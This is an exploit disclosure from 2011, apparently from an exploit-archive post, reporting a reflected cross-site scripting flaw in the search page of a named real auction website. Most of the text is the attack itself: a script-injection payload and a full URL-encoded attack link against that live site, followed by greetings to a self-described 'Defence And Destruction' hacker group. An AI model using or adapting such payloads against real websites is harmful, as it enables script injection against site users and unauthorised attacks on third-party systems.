Rinkya Cross Site Scripting

`  
# Exploit Title: Rinkya Cross Site Scripting  
# Date: 22.10.2011 - 17.52  
# Author: Mr.PaPaRoSSe  
# Tested On: BackTrack 5 - Windows xp sp3  
# Platform: Php  
  
-------------------------------------------------------------  
  
search.php  
  
http://www.rinkya.com/membership/search.php  
  
"><script>alert("DDz Mr.PaPaRoSSe")</script>  
  
  
http://www.rinkya.com/membership/search.php?sType=Auction&searchstring=%22%3E%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&SUBMIT=Sorguyu+g%C3%B6nder  
  
-------------------------------------------------------------  
Contact: paparosse.blogspot.com  
Greetz: http://DarkDevilz.in/  
-------------------------------------------------------------  
3spi0n - ALEXTRAX - sanTiq0   
Deathless - ZyX - Tarxes  
53rh4+ - bLaCk_uMo - PeRs   
syntaX - Mavi_Karalýk - DarkCOD3R  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
  
  
`